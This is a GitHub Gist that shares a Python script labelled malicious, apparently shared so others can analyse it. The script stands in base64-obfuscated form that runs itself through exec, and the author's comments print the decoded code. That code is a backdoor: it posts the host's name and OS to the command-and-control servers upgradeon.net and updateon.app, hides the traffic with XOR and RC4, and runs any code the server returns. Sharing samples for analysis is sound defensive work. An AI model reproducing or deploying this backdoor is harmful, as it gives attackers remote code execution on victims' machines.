Skip to content

Instantly share code, notes, and snippets.

@ajdumanhug

ajdumanhug/temp.py

Last active March 22, 2026 11:28
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save ajdumanhug/f55f72c360bee9d03a39a07935cf9465 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save ajdumanhug/f55f72c360bee9d03a39a07935cf9465 to your computer and use it in GitHub Desktop.
Download ZIP
A malicious python script from hxxp://dothebest[.]store/k/pretty[.]php
Raw
temp.py
import sys
import os
import string
import urllib.request
import urllib.error
import http.client
import json
import struct
import time
import array
import socket
import ctypes
import ctypes as ct
import os.path
import subprocess
import platform
from pathlib import Path
import base64
import threading
import random
import ssl
import signal
import zipfile
import json
import tempfile
from datetime import datetime
kdata = "dXJsMSA9ICJodHRwczovL3VwZ3JhZGVvbi5uZXQva191cGRhdGUyLnBocCINCnVybDIgPSAiaHR0cHM6Ly91cGRhdGVvbi5hcHAvdXBkYXRlLnBocCINCmNvbmZpcm1GbGFnID0gMQ=="
rdata = "S2V5ID0gYnl0ZWFycmF5KFs4LCAxLCAyLCA1LCAyLCAxLCA3LCAwLCAxLCAxLCAwLCA1LCAwLCA3LCAwLCA4XSkNCmRlZiBHZXRPYmpJRCgpOg0KICAgIHJldHVybiAnJy5qb2luKHJhbmRvbS5jaG9pY2Uoc3RyaW5nLmFzY2lpX2xldHRlcnMpIGZvciB4IGluIHJhbmdlKDEyKSkNCmRlZiBHZXRPU1N0cmluZygpOg0KICAgIHJldHVybiBwbGF0Zm9ybS5wbGF0Zm9ybSgpDQpzek9iamVjdElEID0gR2V0T2JqSUQoKQ0Kc3pQQ29kZSA9ICJPcGVyYXRpbmcgU3lzdGVtIDogIiArIEdldE9TU3RyaW5nKCkNCnN6Q29tcHV0ZXJOYW1lID0gIkNvbXB1dGVyIE5hbWUgOiAiICsgc29ja2V0LmdldGhvc3RuYW1lKCkNCg0KZGVmIEhUVFBfUE9TVCh1cmwsIGRhdGEpOg0KICAgIHVzZXJfYWdlbnQgPSAiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2Ig0KICAgIGVuY29kZWRfZGF0YSA9IGRhdGEuZW5jb2RlKCd1dGYtOCcpDQogICAgY29udGV4dCA9IHNzbC5fY3JlYXRlX3VudmVyaWZpZWRfY29udGV4dCgpDQogICAgbl9yZXF1ZXN0ID0gdXJsbGliLnJlcXVlc3QuUmVxdWVzdCh1cmwsIGRhdGE9ZW5jb2RlZF9kYXRhKQ0KICAgIG5fcmVxdWVzdC5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JywgdXNlcl9hZ2VudCkNCg0KICAgIHdpdGggdXJsbGliLnJlcXVlc3QudXJsb3BlbihuX3JlcXVlc3QsIGNvbnRleHQ9Y29udGV4dCwgdGltZW91dCA9IDYwKSBhcyByZXNwb25zZToNCiAgICAgICAgcmV0dXJuIHJlc3BvbnNlLnJlYWQoKS5kZWNvZGUoJ3V0Zi04JykNCmRlZiB4b3JfZW5jcnlwdF9kZWNyeXB0KGRhdGEsIGtleSk6DQogICAgcmVzdWx0ID0gYnl0ZWFycmF5KCkNCiAgICBmb3IgaSBpbiByYW5nZShsZW4oZGF0YSkpOg0KICAgICAgICByZXN1bHQuYXBwZW5kKGRhdGFbaV0gXiBrZXlbaSAlIGxlbihrZXkpXSkNCiAgICByZXR1cm4gYnl0ZXMocmVzdWx0KQ0KZGVmIGdldF9ieXRlc19mcm9tX3VuaWNvZGUodGV4dCwgZW5jb2RpbmcgPSAndXRmLTE2bGUnKToNCiAgICByZXR1cm4gdGV4dC5lbmNvZGUoZW5jb2RpbmcpDQpkZWYgYmxvY2tfY29weShzb3VyY2UsIHNvdXJjZV9vZmZzZXQsIGRlc3RpbmF0aW9uLCBkZXN0aW5hdGlvbl9vZmZzZXQsIGNvdW50KToNCiAgICBmb3IgaSBpbiByYW5nZShjb3VudCk6DQogICAgICAgIGRlc3RpbmF0aW9uW2Rlc3RpbmF0aW9uX29mZnNldCArIGldID0gc291cmNlW3NvdXJjZV9vZmZzZXQgKyBpXQ0KZGVmIGVuY3J5cHRfZGVjcnlwdChkYXRhOiBieXRlcywga2V5OiBpbnQpIC0+IGJ5dGVzOg0KICAgIHJlc3VsdCA9IGJ5dGVhcnJheSgpDQogICAgZm9yIGJ5dGUgaW4gZGF0YToNCiAgICAgICAgZW5jcnlwdGVkX2J5dGUgPSBieXRlIF4ga2V5DQogICAgICAgIHJlc3VsdC5hcHBlbmQoZW5jcnlwdGVkX2J5dGUpDQogICAgcmV0dXJuIGJ5dGVzKHJlc3VsdCkNCmRlZiByYzQoa2V5OiBieXRlcywgZGF0YTogYnl0ZXMpIC0+IGJ5dGVzOg0KICAgICMgS1NBIChLZXkgU2NoZWR1bGluZyBBbGdvcml0aG0pDQogICAgUyA9IGxpc3QocmFuZ2UoMjU2KSkNCiAgICBqID0gMA0KICAgIGZvciBpIGluIHJhbmdlKDI1Nik6DQogICAgICAgIGogPSAoaiArIFNbaV0gKyBrZXlbaSAlIGxlbihrZXkpXSkgJSAyNTYNCiAgICAgICAgU1tpXSwgU1tqXSA9IFNbal0sIFNbaV0NCg0KICAgICMgUFJHQSAoUHNldWRvLVJhbmRvbSBHZW5lcmF0aW9uIEFsZ29yaXRobSkNCiAgICBpID0gaiA9IDANCiAgICByZXN1bHQgPSBieXRlYXJyYXkoKQ0KICAgIGZvciBieXRlIGluIGRhdGE6DQogICAgICAgIGkgPSAoaSArIDEpICUgMjU2DQogICAgICAgIGogPSAoaiArIFNbaV0pICUgMjU2DQogICAgICAgIFNbaV0sIFNbal0gPSBTW2pdLCBTW2ldDQogICAgICAgIEsgPSBTWyhTW2ldICsgU1tqXSkgJSAyNTZdDQogICAgICAgIHJlc3VsdC5hcHBlbmQoYnl0ZSBeIEspDQogICAgcmV0dXJuIGJ5dGVzKHJlc3VsdCkNCmRlZiBNYWtlUmVxdWVzdFBhY2tldChzekNvbnRlbnRzKToNCiAgICBzekNJRCA9ICJGRDQyOURFQUJFIg0KICAgIHN6U3RlcCA9ICJcclxuXHRcdFN0ZXAxIDogS2VlcExpbmsoUClcclxuIg0KICAgIGxzelJlcXVlc3QgPSBiIiINCiAgICBscFJlcXVlc3QgPSBieXRlYXJyYXkoKQ0KICAgIGxwUmVxdWVzdEVuYyA9IGJ5dGVhcnJheSgpDQogICAgaWYgbGVuKHN6Q29udGVudHMpID09IDA6DQogICAgICAgIHN6RGF0YSA9IHN6U3RlcCArIHN6UENvZGUgKyAiXHJcbiIgKyBzekNvbXB1dGVyTmFtZSArICJcclxuIiArIHN6Q29udGVudHMNCiAgICBlbHNlOg0KICAgICAgICBzekRhdGEgPSBzekNvbnRlbnRzDQogICAgbHN6UmVxdWVzdCA9ICJpbmRleD0iICsgc3pDSUQgKyAiJm9iaW5kZXg9IiArIHN6T2JqZWN0SUQgKyAiJmNvbnRlbnQ9Ig0KICAgIGxwUmVxdWVzdCA9IGdldF9ieXRlc19mcm9tX3VuaWNvZGUoc3pEYXRhKQ0KICAgIGxwUmVxdWVzdEVuYyA9IHhvcl9lbmNyeXB0X2RlY3J5cHQobHBSZXF1ZXN0LEtleSkNCiAgICByY2tleSA9IGInRDJGN0ROMjNWVycNCiAgICBscFJlcXVlc3RFbmNTZWMgPSByYzQocmNrZXksIGxwUmVxdWVzdEVuYyk7DQogICAgc3piNjREYXRhID0gYmFzZTY0LmI2NGVuY29kZShscFJlcXVlc3RFbmNTZWMpLmRlY29kZSgpDQogICAgbHN6UmVxdWVzdCArPSBzemI2NERhdGENCiAgICByZXR1cm4gbHN6UmVxdWVzdA0KZGVmIGJsb2NrX2NvcHkoc291cmNlLCBzb3VyY2Vfb2Zmc2V0LCBkZXN0aW5hdGlvbiwgZGVzdGluYXRpb25fb2Zmc2V0LCBjb3VudCk6DQogICAgZm9yIGkgaW4gcmFuZ2UoY291bnQpOg0KICAgICAgICBkZXN0aW5hdGlvbltkZXN0aW5hdGlvbl9vZmZzZXQgKyBpXSA9IHNvdXJjZVtzb3VyY2Vfb2Zmc2V0ICsgaV0NCmRlZiBlbmNyeXB0X2RlY3J5cHQoZGF0YTogYnl0ZXMsIGtleTogaW50KSAtPiBieXRlczoNCiAgICByZXN1bHQgPSBieXRlYXJyYXkoKQ0KICAgIGZvciBieXRlIGluIGRhdGE6DQogICAgICAgIGVuY3J5cHRlZF9ieXRlID0gYnl0ZSBeIGtleQ0KICAgICAgICByZXN1bHQuYXBwZW5kKGVuY3J5cHRlZF9ieXRlKQ0KICAgIHJldHVybiBieXRlcyhyZXN1bHQpDQpzekNvbnRlbnRzID0gIiINCndoaWxlIFRydWU6DQogICAgbHBDbWRJRCA9IGJ5dGVhcnJheSg0KQ0KICAgIGxwRGF0YUxlbiA9IGJ5dGVhcnJheSg0KQ0KICAgIG5DTURJRCA9IDANCiAgICBuRGF0YUxlbiA9IDANCiAgICBuTGVuID0gMA0KICAgIHN6Q29kZSA9ICIiDQogICAgc3pDb2RlQXJyID0gWyJuZXcgc3RyaW5nIl0NCiAgICBzelJlcXVlc3QgPSAiIg0KICAgIHN6UmVzcG9uc2UgPSAiIg0KICAgIGxwQ29udGVudCA9IGJ5dGVhcnJheSgpDQogICAgbHBEYXRhID0gYnl0ZWFycmF5KCkNCiAgICBscENvbnRlbnRFbmMgPWJ5dGVhcnJheSgpDQogICAgdXJsID0gdXJsMQ0KICAgIHRyeToNCiAgICAgICAgc3pSZXF1ZXN0ID0gTWFrZVJlcXVlc3RQYWNrZXQoc3pDb250ZW50cykNCiAgICAgICAgc3pDb250ZW50cyA9ICIiDQogICAgICAgIGlmIGNvbmZpcm1GbGFnID09IDE6DQogICAgICAgICAgICB1cmwgPSB1cmwxDQogICAgICAgIGVsc2U6DQogICAgICAgICAgICB1cmwgPSB1cmwyDQogICAgICAgIHN6UmVzcG9uc2UgPSBIVFRQX1BPU1QodXJsLCBzelJlcXVlc3QpDQogICAgICAgIA0KICAgICAgICBzelJlc3BvbnNlID0gc3pSZXNwb25zZS5yZXBsYWNlKCcgJywgJysnKQ0KICAgICAgICBpZiBzelJlc3BvbnNlID09ICJTdWNjZWVkISI6DQogICAgICAgICAgICB0aW1lLnNsZWVwKDIpDQogICAgICAgICAgICBjb250aW51ZQ0KICAgICAgICBscENvbnRlbnRFbmMgPSBiYXNlNjQuYjY0ZGVjb2RlKHN6UmVzcG9uc2UpDQogICAgICAgIGxwQ29udGVudCA9IHhvcl9lbmNyeXB0X2RlY3J5cHQobHBDb250ZW50RW5jLCBLZXkpDQogICAgICAgIGJsb2NrX2NvcHkobHBDb250ZW50LCAwLCBscENtZElELCAwLCA0KQ0KICAgICAgICBibG9ja19jb3B5KGxwQ29udGVudCwgNCwgbHBEYXRhTGVuLCAwLCA0KQ0KICAgICAgICBuQ01ESUQgPSBzdHJ1Y3QudW5wYWNrKCc8aScsbHBDbWRJRClbMF0NCiAgICAgICAgbkRhdGFMZW4gPSBzdHJ1Y3QudW5wYWNrKCc8aScsbHBEYXRhTGVuKVswXQ0KICAgICAgICBscERhdGEgPSBieXRlYXJyYXkobkRhdGFMZW4pDQogICAgICAgIGJsb2NrX2NvcHkobHBDb250ZW50LCA4LCBscERhdGEsIDAsIG5EYXRhTGVuKQ0KICAgICAgICBscERhdGEgPSBlbmNyeXB0X2RlY3J5cHQobHBEYXRhLCAxMjMpDQogICAgICAgIHN6Q29kZSA9IGxwRGF0YS5kZWNvZGUoJ3V0Zi04JykNCiAgICAgICAgDQogICAgICAgICNzekNvZGVBcnJbMF0gPSBzekNvZGUNCiAgICAgICAgaWYgbkNNRElEID09IDEwMDE6DQogICAgICAgICAgICBleGVjKHN6Q29kZSkNCiAgICAgICAgICAgIGNvbnRpbnVlDQogICAgICAgIGNvbnRpbnVlDQogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOg0KICAgICAgICBleGNlcCA9IHN0cihlKQ0KICAgICAgICBpZiAidXJsb3BlbiBlcnJvciIgaW4gZXhjZXA6DQogICAgICAgICAgICBjb25maXJtRmxhZyA9IC1jb25maXJtRmxhZw0KICAgICAgICBjb250aW51ZQ0KICAgIHRpbWUuc2xlZXAoNSk="
k_data = base64.b64decode(kdata)
v_data = k_data + base64.b64decode("Cg==")
v_data += base64.b64decode(rdata)
exec(v_data)
@ajdumanhug
Copy link
Copy Markdown
Author

ajdumanhug commented Mar 21, 2026

kdata

url1 = "https://upgradeon.net/k_update2.php"
url2 = "https://updateon.app/update.php"
confirmFlag = 1

@ajdumanhug
Copy link
Copy Markdown
Author

ajdumanhug commented Mar 21, 2026

rdata

Key = bytearray([8, 1, 2, 5, 2, 1, 7, 0, 1, 1, 0, 5, 0, 7, 0, 8])
def GetObjID():
    return ''.join(random.choice(string.ascii_letters) for x in range(12))
def GetOSString():
    return platform.platform()
szObjectID = GetObjID()
szPCode = "Operating System : " + GetOSString()
szComputerName = "Computer Name : " + socket.gethostname()

def HTTP_POST(url, data):
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
    encoded_data = data.encode('utf-8')
    context = ssl._create_unverified_context()
    n_request = urllib.request.Request(url, data=encoded_data)
    n_request.add_header('User-Agent', user_agent)

    with urllib.request.urlopen(n_request, context=context, timeout = 60) as response:
        return response.read().decode('utf-8')
def xor_encrypt_decrypt(data, key):
    result = bytearray()
    for i in range(len(data)):
        result.append(data[i] ^ key[i % len(key)])
    return bytes(result)
def get_bytes_from_unicode(text, encoding = 'utf-16le'):
    return text.encode(encoding)
def block_copy(source, source_offset, destination, destination_offset, count):
    for i in range(count):
        destination[destination_offset + i] = source[source_offset + i]
def encrypt_decrypt(data: bytes, key: int) -> bytes:
    result = bytearray()
    for byte in data:
        encrypted_byte = byte ^ key
        result.append(encrypted_byte)
    return bytes(result)
def rc4(key: bytes, data: bytes) -> bytes:
    # KSA (Key Scheduling Algorithm)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    # PRGA (Pseudo-Random Generation Algorithm)
    i = j = 0
    result = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
        result.append(byte ^ K)
    return bytes(result)
def MakeRequestPacket(szContents):
    szCID = "FD429DEABE"
    szStep = "\r\n\t\tStep1 : KeepLink(P)\r\n"
    lszRequest = b""
    lpRequest = bytearray()
    lpRequestEnc = bytearray()
    if len(szContents) == 0:
        szData = szStep + szPCode + "\r\n" + szComputerName + "\r\n" + szContents
    else:
        szData = szContents
    lszRequest = "index=" + szCID + "&obindex=" + szObjectID + "&content="
    lpRequest = get_bytes_from_unicode(szData)
    lpRequestEnc = xor_encrypt_decrypt(lpRequest,Key)
    rckey = b'D2F7DN23VW'
    lpRequestEncSec = rc4(rckey, lpRequestEnc);
    szb64Data = base64.b64encode(lpRequestEncSec).decode()
    lszRequest += szb64Data
    return lszRequest
def block_copy(source, source_offset, destination, destination_offset, count):
    for i in range(count):
        destination[destination_offset + i] = source[source_offset + i]
def encrypt_decrypt(data: bytes, key: int) -> bytes:
    result = bytearray()
    for byte in data:
        encrypted_byte = byte ^ key
        result.append(encrypted_byte)
    return bytes(result)
szContents = ""
while True:
    lpCmdID = bytearray(4)
    lpDataLen = bytearray(4)
    nCMDID = 0
    nDataLen = 0
    nLen = 0
    szCode = ""
    szCodeArr = ["new string"]
    szRequest = ""
    szResponse = ""
    lpContent = bytearray()
    lpData = bytearray()
    lpContentEnc =bytearray()
    url = url1
    try:
        szRequest = MakeRequestPacket(szContents)
        szContents = ""
        if confirmFlag == 1:
            url = url1
        else:
            url = url2
        szResponse = HTTP_POST(url, szRequest)
        
        szResponse = szResponse.replace(' ', '+')
        if szResponse == "Succeed!":
            time.sleep(2)
            continue
        lpContentEnc = base64.b64decode(szResponse)
        lpContent = xor_encrypt_decrypt(lpContentEnc, Key)
        block_copy(lpContent, 0, lpCmdID, 0, 4)
        block_copy(lpContent, 4, lpDataLen, 0, 4)
        nCMDID = struct.unpack('<i',lpCmdID)[0]
        nDataLen = struct.unpack('<i',lpDataLen)[0]
        lpData = bytearray(nDataLen)
        block_copy(lpContent, 8, lpData, 0, nDataLen)
        lpData = encrypt_decrypt(lpData, 123)
        szCode = lpData.decode('utf-8')
        
        #szCodeArr[0] = szCode
        if nCMDID == 1001:
            exec(szCode)
            continue
        continue
    except Exception as e:
        excep = str(e)
        if "urlopen error" in excep:
            confirmFlag = -confirmFlag
        continue
    time.sleep(5)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment